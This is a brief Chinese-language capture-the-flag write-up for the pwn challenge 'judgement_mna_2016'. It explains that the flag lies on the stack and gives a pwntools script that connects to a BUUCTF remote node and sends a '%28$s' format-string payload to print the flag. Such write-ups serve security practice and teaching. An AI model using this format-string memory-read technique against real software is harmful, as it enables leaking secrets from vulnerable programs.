judgement_mna_2016
查看保护
这里有一个格式化字符串,flag也被放到栈上去了。
这题目很简单,flag在栈上,动调一下看一下flag的偏移然后借助格式化打印出来就行了
28的偏移
from pwn import *
context(arch='i386', os='linux', log_level='debug')
file_name = './z1r0'
debug = 1
if debug:
r = remote('node4.buuoj.cn', 27337)
else:
r = process(file_name)
elf = ELF(file_name)
def dbg():
gdb.attach(r)
p1 = b'%28$s'
r.sendline(p1)
r.interactive()